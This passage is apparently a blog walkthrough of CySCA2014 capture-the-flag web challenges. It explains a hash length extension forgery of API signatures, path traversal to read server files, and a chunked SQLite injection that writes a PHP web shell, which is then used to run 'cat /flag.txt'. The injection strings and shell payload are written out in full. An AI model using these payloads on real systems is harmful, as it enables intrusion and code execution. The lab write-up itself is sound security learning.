We’ve seen previously that our method of calculating new API signatures with a length extension attack is correct, so we must be doing something else wrong. As it turns out, we were doing two things wrong. First of all, we weren’t adding the new value for filepath to HashPump in the correct way. Remember, the REST API documentation specifies that all ‘&’ and ‘=’ symbols need to be removed from the parameter list when calculating the API signature. Although we were doing this in HashPump for the original message, we completely forgot to do it for the appended information. So the server would calculate the API signature on the string “SECRETcontenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdffilepath/../../../../var/www/index.php”.

Meanwhile HashPump was calculating the API signature on the string “SECRETcontenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdf&filepath=/../../../../var/www/index.php”.

Clearly, these strings would lead to different API signatures. However, after correcting this mistake the server would still not accept our API signature. Apparently the server was processing the request differently than we were expecting. Maybe it was not simply overwriting the parameter with the last assigned value, or maybe it was overwriting it before calculating the API signature. In both of those cases, the resulting API signature would be different from the one we calculated using HashPump.


Again we returned to Google for ideas on what to do next, and this time we stumbled on one of the most famous examples of a length extension attack: The exploitation of Flickr’s REST API in 2009. A write-up of this attack can be found here: http://netifera.com/research/flickr_api_signature_forgery.pdf.

We noticed two things while reading this write-up: (1) the scenario provided in this Cysca challenge is identical to the vulnerability in Flickr’s REST API down to the description of the API itself, and (2) we completely missed a vulnerability in how the API signature is calculated. What we failed to pick up on initially is that with the way an API signature is calculated, a signature for “filepath=./example.pdf” is equivalent to the signature for “f=ilepath./example.pdf”. The reason for this is that for the calculation of the signature, the ‘&’ and ‘=’ symbols are removed from the string, so for both examples the resulting string on which the signature is calculated would be “filepath./example.pdf”. This is the crucial factor in this challenge that allowed us to generate valid API keys while modifying the original request.

We ended up using this information by assigning almost everything in the original message to a parameter named just ‘c’ – the first letter in the original message – that would be ignored by the server, since ‘c’ is not a parameter that makes sense to the server. We then used HashPump to append the original parameter names to the request and generate a valid signature. The following screenshots show what that looks like, from the command line as well as the request that was issued to the server.



Finally! We were able to modify the values for the parameters that get submitted to the server while still being able to use the original message to perform a length extension attack and generate a valid API signature!

Now, all we have to do is find the path to an existing file on the server. We know that the file ‘index.php’ exists, since it gets included in the URL to reach the Fortress Certifications front page. Apparently, it is not located at ‘/var/www/index.php’, which is where it commonly resides. Instead, it is located in the same directory as the ‘documents’ folder. This was found out after trying a couple of different requests with different file paths, until the message below was received.


This message indicates that the REST API created a new link to a document – ‘index.php’. The link is located at Note that the IP address for the host has changed from before (it used to be but this is because of changes in our virtual network settings and not because of the request to the REST API.

Navigating to this URL provides us with a download prompt, and opening the downloaded file provided us with more information about other files that might be worth looking at: ‘cache.php’, and ‘caching.php’.


We can repeat the same process as before to also create links to these files through the REST API. After doing so, and opening ‘cache.php’, we found the flag that marks the completion of this challenge: “OrganicPamperSenator877”.



Reveal the final flag, which is hidden in the /flag.txt file on the web server.

The ‘index.php’ and ‘cache.php’ files tell us how we can get to the caching control panel. We need to generate an MD5 hash of “OrganicPamperSenator877” and append it to http://<host>/cache.php?access=”. Doing so brings us to the page below.


The caching control panel enables the caching of certain pages. We can enter a title and a URL for a page, and it will be stored as a cached page in the backend database. How this works exactly can be learned by investigating the source code for ‘cache.php’ and ‘caching.php’. These pages contain the functions and logic that work behind the scenes when a request is submitted through this page, and thoroughly investigating the source code can reveal any flaws or vulnerabilities in the caching process.

Through code investigation and some experimentation we were able to determine that the ‘Title’ field is vulnerable to code injection. After submitting a query, the function that inputs the data into the database is “setCache”, which takes the parameters ‘key’, ‘title’, ‘uri’, and ‘data’. Additionally it uses the database function ‘datetime()’ to insert the date and time of when the query was submitted into the database. This function can be seen below. The ‘title’ and ‘uri’ variables come from what we enter into the caching control panel. The ‘key’ variable is an MD5 hash of the server name plus the requested URI, and ‘data’ is the contents of the page that was entered into the ‘URI’ field.


It’s possible to break out of this function through the use of single quotation marks and entering self-chosen values for the variables that the function is expecting. The result of doing so can be seen below.




Even though we get a syntax error, generated by the remaining code behind our injection, the function executes just fine and our self-chosen values get entered into the database. Additionally, by using a SQLite function – random() – in our injection we determined that we can successfully execute other SQLite functions besides datetime(). We knew the backend database was SQLite because this was specified in the source code of ‘caching.php’

This is where we got stuck on this challenge. It seems clear that we have to use code injection and database functions to get to the ‘/flag.txt’ file on the server, but there are two constraining factors that make this challenge extremely difficult: (1) there is a character limit of 40 characters on the ‘Title’ field in the caching control panel. This makes it almost impossible to inject anything useful, and (2) while there is no character limit on the ‘URI’ field, anything entered into this field gets parsed and validated by functions in ‘caching.php’, which makes it seemingly impossible to inject anything into this field.

We spent many hours experimenting with different types of injections and different strategies. We found a page online that explains how to exploit a SQLite database through the use of the ‘ATTACH DATABASE’ command: http://atta.cked.me/home/sqlite3injectioncheatsheet. However, it seemed like this strategy would not work for us due to the limit on how many characters we could enter. Eventually we decided that this challenge was beyond us and we decided to look at the walkthrough posted on the CySCA2014 website: https://cyberchallenge.com.au/CySCA2014_Web_Penetration_Testing.pdf.

Since we didn’t solve this challenge, I won’t provide a description of the solution. Instead I recommend you follow the link above for a walkthrough of the problem. After reading the solution, we were glad we didn’t spend more time on trying to solve it than we already had because the walkthrough blew our minds. There was no way we could have figured this out for ourselves. We were on the right path but the steps that had to be taken to get around the character limit were ridiculous. For the remainder of this walkthrough I will focus on explaining the steps in the CySCA solution, since I don’t think their walkthrough provides a lot of clarification on how to get to ‘/flag.php’. Even after following their steps it took us some time and reasoning to figure out why they worked.

The walkthrough describes that the goal is to inject the following 122-character string into the database:

‘,0); ATTACH DATABASE ‘a.php’ AS a; CREATE TABLE a.b (c text); INSERT INTO a.b VALUES (‘<? system($_GET[”cmd”]); ?>’);/*

The way this is accomplished is by breaking the string up into smaller sections and piecing them back together at a later point. The four strings that are individually injected will be:

  1. ”,0);ATTACH DATABASE ”a.php” AS a;/*
  2. */CREATE TABLE a.b (c text);INSERT /*
  3. */INTO a.b VALUES(”<? system($”||/*
  4. */”_GET[””cmd””]); ?>”);/*

Each string starts with the end to a block comment (*/) and ends with the start to a block comment (/*), except for the first string which doesn’t start with one. This ensures that any code that might make its way in between these strings is commented out – this is what allows these individual database entries to be pieced back together into a single injection string. After performing the code injection, the caching control page will look as below:


You’ll notice that the third entry looks incomplete. However, investigation of the source code of the page reveals that the injected code is all there, it’s just being interpreted differently by your browser.


So what is this supposed to do, once pieced back together? The ‘ATTACH DATABASE’ command will attach a database file to SQLite, but if this file doesn’t exist it will be created. Therefore, effectively this command is creating a file called “a.php”. The rest of the commands first create a table in the newly created database (table a.b) with a single column named ‘text’. One line is inserted into this database table: “<? System($’ ||’_GET[‘’cmd’’]”. This code will eventually find its way into the database file ‘a.php’, and ‘a.php’ should then be accessible as a web page where it will attempt to execute a given system command. So effectively the injection code will provide us with a shell on the system through a web page.

The way in which these four lines of code are pieced back together is by caching the ‘cache.php’ page itself. It took us a while to reason out how caching the caching page would execute this code, but it works because of the first line of injection code. You’ll notice that it starts with “’,0);”. Thinking back to the ‘setCache’ function in the ‘caching.php’ source code you’ll remember that it required five variables, the fourth of which was ‘$data’. The ‘data’ variable contained the source code for whatever page was being cached. By starting the first line of injection code with “’,0);” we’re effectively breaking out of the ‘data’ variable and executing the code that comes after – the code that attaches the database.

So by caching the ‘cache.php’ page, the setCache() function will look at the source code for the page that is being cached: ‘cache.php’. On the page it will encounter the first line of injection code, which breaks out of the ‘data’ variable. It then executes the rest of the code until it gets to the block comment marker (/*). It ignores whatever comes next until the end of the block comment marker is encountered, which is at the beginning of the next line of injection code. This continues until all four lines of injection code have been pieced together, and they then get executed, causing ‘a.php’ to be created with the code that allows us to execute commands on the system. The screenshots below show this process.


NOTE: I messed up my commands, resulting in a file ‘a.php’ which did not allow me to execute system commands. I entered everything again but of course table ‘a’ and column ‘a.b’ already existed, so in the rest of the screenshots you will see ‘z.php’ and database ‘z’ instead.



As shown above, accessing ‘z.php’ and feeding it the ‘ls’ command returns the contents of the working directory. The SQLite information at the start of the file is there because SQLite created ‘z.php’ as a database file, so it has additional database information in it. It doesn’t interfere with our commands though, and feeing the system command ‘cat /flag.txt’ returns to us the final flag for the web application pentest section of CySCA2014: “TryingCrampFibrous963”.